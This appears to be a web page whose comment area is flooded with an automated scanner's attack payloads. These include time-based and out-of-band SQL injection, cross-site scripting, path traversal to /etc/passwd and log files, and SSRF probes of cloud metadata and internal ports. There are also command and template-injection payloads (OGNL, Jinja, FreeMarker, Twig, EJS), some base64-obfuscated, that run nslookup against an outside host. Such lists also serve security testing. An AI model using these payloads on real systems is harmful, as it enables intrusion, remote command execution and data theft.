));SELECT pg_sleep(25)-- /* 9de28400-b801-4a60-9a74-26dbf5e56b75 */

&#39;+netsparker(0x03376A)+&#39;

DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','jdnsqy3xdcbhj0x4sk--qtcadmey-t8i2msb54wn'+'hpi.r87.me')exec sp_executesql @r

[::1]/elmah.axd

createobject("WScript.Shell").exec("nslookup jdnsqy3xdctmcmxx2xr916g9_3hn9wnpixluklg9" & "rui.r87.me").StdOut.ReadAll

/../../../../../../../../../../var/log/apache2/error.log

arguments[1].end(require('child_process').execSync('expr 268409241 - 92102'))

";l=document.createElement("link");l.rel="prefetch";l.href="//jdnsqy3xdckt5lr42k2nqbi4eu3h6jqnj-5przry"+"ofs.r87.me/r/?"+location.href;document.head.appendChild(l);//

((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 7b0e2451-c755-41d5-84d4-af8ad1291d97 */

'"@--></style></scRipt><scRipt>netsparker(0x03377A)</scRipt>

1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','jdnsqy3xdclmlsj0uied3q1wzazzuknzdubsaile'+'bms.r87.me')exec sp_executesql @r--

https://bullsinvesting.club/elmah

+createobject("WScript.Shell").exec("nslookup jdnsqy3xdc-3usjwo5uudi1ypue5-2ns58k43nl8" & "dqa.r87.me").StdOut.ReadAll

/../../../../../../../../../../var/log/apache/error.log

arguments[1].end(require('child_process').execSync('set /A 268409241 - 80940'))

'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 190c77e1-2599-468a-bd9e-8177e7edb6cf */

%22%2bnetsparker(0x0337C6)%2b%22

-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','jdnsqy3xdcsalypn9yhldflgjhiqqqygc9ebh2ek'+'tg4.r87.me')exec sp_executesql @r--

bullsinvesting.club/elmah

';l=document.createElement("link");l.rel="prefetch";l.href="//jdnsqy3xdccx3z4fhpjwdhzcsear35nkcud135yl"+"ooc.r87.me/r/?"+location.href;document.head.appendChild(l);//

+createobject("WScript.Shell").exec("nslookup jdnsqy3xdcanognqawzfrjhzx2j1zugaygxipv8m" & "_f4.r87.me").StdOut.ReadAll+

/../../../../../../../../../../proc/version

%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-50378)}

-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* eeeff85a-4828-46b4-835b-75f562aeb1de */

<html xmlns="http://www.w3.org/1999/xhtml"><script>netsparker(0x0337DC)</script></html>

SELECT dblink_connect('host=jdnsqy3xdc-5avcqjuvuiejraargg3uyhp6acskf'||'_su.r87.me user=a password=a connect_timeout=2')

157.245.92.196/elmah

<%createobject("WScript.Shell").exec("nslookup jdnsqy3xdc2pksqea5d-hwb6ytwj9pj3uilszkin" & "ui8.r87.me").StdOut.ReadAll%>

p "#{0xFFF9999.to_i-`echo 37788`.to_i}"

-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 839db5fd-a7c4-4788-8227-849ef5303412 */

//r87.com/?0x03384B

dblink_connect('host=jdnsqy3xdckacmtekwumh026f7t7w3bcosphqcr5'||'wy8.r87.me user=a password=a connect_timeout=2')

127.100.11.2/elmah

<iframe src="//jdnsqy3xdchja7sz9izwx6lkhabsiakekgkjjozu8gs&#46;r87&#46;me"></iframe>

"+createobject("WScript.Shell").exec("nslookup jdnsqy3xdcbbgmle98rs7oymhb84wmhcax9cntbc" & "mqw.r87.me").StdOut.ReadAll+"

/../../../../../../../../../../../etc/passwd

__import__('os').popen(('expr 268409241 - {0}').format('47923')).read()

-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* c12613c9-d913-459e-a889-8ab55825e3e1 */

<a HrEf=JaVaScRiPt:netsparker(0x0339EB)>

cast((SELECT dblink_connect('host=jdnsqy3xdcu1k8_euxzfx7ielbawjpn_pgfpepoh'||'bhy.r87.me user=a password=a connect_timeout=2')) as numeric)

127.0.0.1/elmah

gethostbyname(lc 'jdnsqy3xdc4xj8a4fqpd03vzjiqxdjon3q41ogsb'.'r3i.r87.me')

file:///etc/passwd

__import__('os').popen(('SET /A 268409241 - {0}').format('43067')).read()

') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* fa3241f3-80d1-4520-9996-0d14c322b10a */

ns@mail.ns'"/>()%26%25<ScRiPt >netsparker(0x0339FE)</ScRiPt>

cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(106)||chr(100)||chr(110)||chr(115)||chr(113)||chr(121)||chr(51)||chr(120)||chr(100)||chr(99)||chr(49)||chr(110)||chr(103)||chr(119)||chr(48)||chr(97)||chr(113)||chr(120)||chr(100)||chr(52)||chr(117)||chr(119)||chr(120)||chr(119)||chr(112)||chr(113)||chr(110)||chr(111)||chr(53)||chr(100)||chr(55)||chr(104)||chr(109)||chr(101)||chr(120)||chr(102)||chr(100)||chr(105)||chr(112)||chr(108)||chr(57)||chr(105)||chr(113)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)

[::1]/elmah

eval('gethostbyname(lc 'jdnsqy3xdcezkjdurzxsumq3nkdrnc66furbjfwn'.'vzs.r87.me')')

' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 45b43325-6d69-46cf-be85-3f9d2749b528 */

Content-Type:text/html

<scRipt>ns(0x033A5D)</scRipt>

'||(SELECT dblink_connect('host=jdnsqy3xdc7yonc25oorxisxt7herbahjwkddx1j'||'ois.r87.me user=a password=a connect_timeout=2'))||'

http://aws.r87.me/latest/meta-data/public-hostname

'+gethostbyname(lc 'jdnsqy3xdcvsxukjck9wdb5m7k0zt6po_vqsmr0e'.'ihg.r87.me')+'

'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 34c53611-f335-4236-bf05-c5bd198494e4 */

<frame src="javascript:netsparker('netsparker(0x033AA3)')"></frame>

(select UTL_INADDR.GET_HOST_ADDRESS('jdnsqy3xdc6eh-83ooqhipk0ug9aauz8crblcm8m'||'hrw.r87.me') from DUAL)

http://169.254.169.254/latest/meta-data/public-hostname

"+gethostbyname(lc 'jdnsqy3xdcxk8hfpn3m6x1zsc2lipfwp8fvxja1j'.'wbi.r87.me')+"

...//...//...//...//...//...//...//...//...//...//...//etc/passwd

<scr<script>ipt>netsparker(0x033B87)</scr</script>ipt>

(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('jdnsqy3xdcz1tiwbywdr8e8sz95m6hotaf-r39wz'||'yne.r87.me') from DUAL))))

http://127.0.0.1:22

nslookup jdnsqy3xdc6ibj-_dcvggkx4m4p6pkfe2ad8gwd0^0vw.r87.me&'\"`0&nslookup jdnsqy3xdc6ibj-_dcvggkx4m4p6pkfe2ad8gwd0^0vw.r87.me&`'

....//....//....//....//....//....//....//....//....//....//....//etc/passwd

<iframe src="javascript:ns(0x033BDB)"></iframe>

'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('jdnsqy3xdcmc-gpbw9rvr8ljldjei3koufs5mlr1'||'p9e.r87.me') from DUAL))||'

http://157.245.92.196:22

& nslookup jdnsqy3xdcmnyepdlvol8kpkwibqnhtii-y5pz4t^ufe.r87.me&'\"`0&nslookup jdnsqy3xdcmnyepdlvol8kpkwibqnhtii-y5pz4t^ufe.r87.me&`'

.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd

"><x oncut=ns(363)>

(select UTL_INADDR.GET_HOST_ADDRESS(chr(106)||chr(100)||chr(110)||chr(115)||chr(113)||chr(121)||chr(51)||chr(120)||chr(100)||chr(99)||chr(102)||chr(118)||chr(121)||chr(121)||chr(111)||chr(113)||chr(112)||chr(53)||chr(122)||chr(105)||chr(104)||chr(117)||chr(110)||chr(102)||chr(116)||chr(107)||chr(117)||chr(106)||chr(52)||chr(103)||chr(109)||chr(112)||chr(100)||chr(102)||chr(102)||chr(53)||chr(121)||chr(115)||chr(118)||chr(106)||chr(107)||chr(54)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)

http://[::1]:22

'& nslookup jdnsqy3xdckme9ffeb2bjbehptjan9y5yzj_5jmf^bfi.r87.me&'\"`0&nslookup jdnsqy3xdckme9ffeb2bjbehptjan9y5yzj_5jmf^bfi.r87.me&`'

. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd

(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(106)||chr(100)||chr(110)||chr(115)||chr(113)||chr(121)||chr(51)||chr(120)||chr(100)||chr(99)||chr(98)||chr(50)||chr(99)||chr(101)||chr(119)||chr(114)||chr(114)||chr(103)||chr(114)||chr(114)||chr(106)||chr(116)||chr(104)||chr(114)||chr(122)||chr(107)||chr(97)||chr(98)||chr(100)||chr(120)||chr(105)||chr(122)||chr(109)||chr(49)||chr(104)||chr(109)||chr(111)||chr(105)||chr(108)||chr(97)||chr(114)||chr(121)||chr(99)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))

http://127.0.0.1:3306

"& nslookup jdnsqy3xdcpyifxz7szskflxx0d2ehwfcrhvmyyd^kcw.r87.me&'\"`0&nslookup jdnsqy3xdcpyifxz7szskflxx0d2ehwfcrhvmyyd^kcw.r87.me&`'

/../../../../../../../../../../../etc/passwd

'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(106)||chr(100)||chr(110)||chr(115)||chr(113)||chr(121)||chr(51)||chr(120)||chr(100)||chr(99)||chr(112)||chr(95)||chr(110)||chr(103)||chr(117)||chr(113)||chr(50)||chr(107)||chr(121)||chr(50)||chr(116)||chr(115)||chr(51)||chr(101)||chr(119)||chr(119)||chr(118)||chr(57)||chr(110)||chr(106)||chr(48)||chr(104)||chr(97)||chr(108)||chr(55)||chr(57)||chr(95)||chr(55)||chr(53)||chr(106)||chr(53)||chr(56)||chr(107)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'

http://157.245.92.196:3306

nslookup "jdnsqy3xdc1otudul7m6xg1mm76kio5ndlvtezkx""1iu.r87.me"

/etc/passwd

http://[::1]:3306

&nslookup "jdnsqy3xdcud1bk1r5emea4tmxwotwf3wp0b-ec7""ha4.r87.me"

%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

https://bullsinvesting.club/server-status

'&nslookup "jdnsqy3xdcnypvtohtnelapehvifr3hvplovvnve""_na.r87.me"

data:;base64,TlM3NzU0NTYxNDQ2NTc1

http://169.254.169.254/opc/v1/instance

"&nslookup "jdnsqy3xdc5odpm1zbsi0cgfzrxt7d_c9cq62qvv""pvk.r87.me"

WEB-INF/web.xml

https://metadata.packet.net/metadata

|nslookup${IFS}"jdnsqy3xdcsimj0xuv_qenidsarurdfbog2va8wk""o30.r87.me"

/../../../../../../../../../../WEB-INF/web.xml

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."jdnsqy3xdcooskfwez9zixwsljepdnrgagw_mdkm""s5m.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

/../../../../../../../../../../var/log/apache2/access.log

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "jdnsqy3xdcbebor4wqdy0uhackfnzsfggscou36k"c_e.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

/../../../../../../../../../../etc/httpd/logs/access.log

{{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgamRuc3F5M3hkYzlya3B1c2JyY2c2M3lkcWRoaDNsYXFzcWtuZGphNW04eS5yODcubWU=')).read()}}

/../../../../../../../../../../var/log/nginx/access.log

{% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnYW1SdWMzRjVNM2hrWTJwa2FtOXVNbDl5ZEY5dlpqQmtiV2RuYldwbGJtNW9iR0Y2YUc4MlkzWm9jUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}

/../../../../../../../../../../opt/lampp/logs/access_log

= global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgamRuc3F5M3hkY3F3eDNyZ2Vhem03MnBld2F1LWx1dGRkb19za3dhbWxiay5yODcubWU=','base64').toString())

/../../../../../../../../../../var/log/lighttpd/access.log

<%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgamRuc3F5M3hkY3NfeGdoZzM1dzZpXzlpX3hva3ZtMGgtaDltb2JhNmowYy5yODcubWU=','base64').toString()) %>

/../../../../../../../../../../AppServ/Apache24/logs/access.log

{php}Smarty_Resource::parseResourceName(system("nslookup jdnsqy3xdcnl5snpydiv6gxvlhx8yffs8kx6ofgn"."jm4.r87.me"),'b');{/php}

../../../../../../../../../../xampp/apache/logs/access.log

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup jdnsqy3xdck_aqxgabtcnuibfznp48dfpfxqnqlz"~"31k.r87.me")}}

/../../../../../../../../../../var/log/apache/access.log

<%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgamRuc3F5M3hkYzZqZmp5YjZ1bS1feHRsY2l2bXFrNWhxNTVlN2t6aHFvby5yODcubWU=')})).to_s}" %>

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<bnNsb29rdXAgamRuc3F5M3hkY2hkX3ZnZHVybWtxNmE3Z3FqejYtYXFlcXJhc2M2Z2J0OC5yODcubWU=|{base64,--decode})}") }

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup jdnsqy3xdcezycp7-vhikfkvpjbv00dutrkjwq5v"+"vrm.r87.me") }

require 'resolv';Resolv.getaddress ("jdnsqy3xdctta4rdetxzhui_otj7idgrfj3d9r7w".concat "xlq.r87.me")

__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgamRuc3F5M3hkY3NzeWx5cHcwdWNzLWtudHR0amNobGlneHAtNHR6eXJnZy5yODcubWU=')).read()

3

Add a new comment
Latest Posts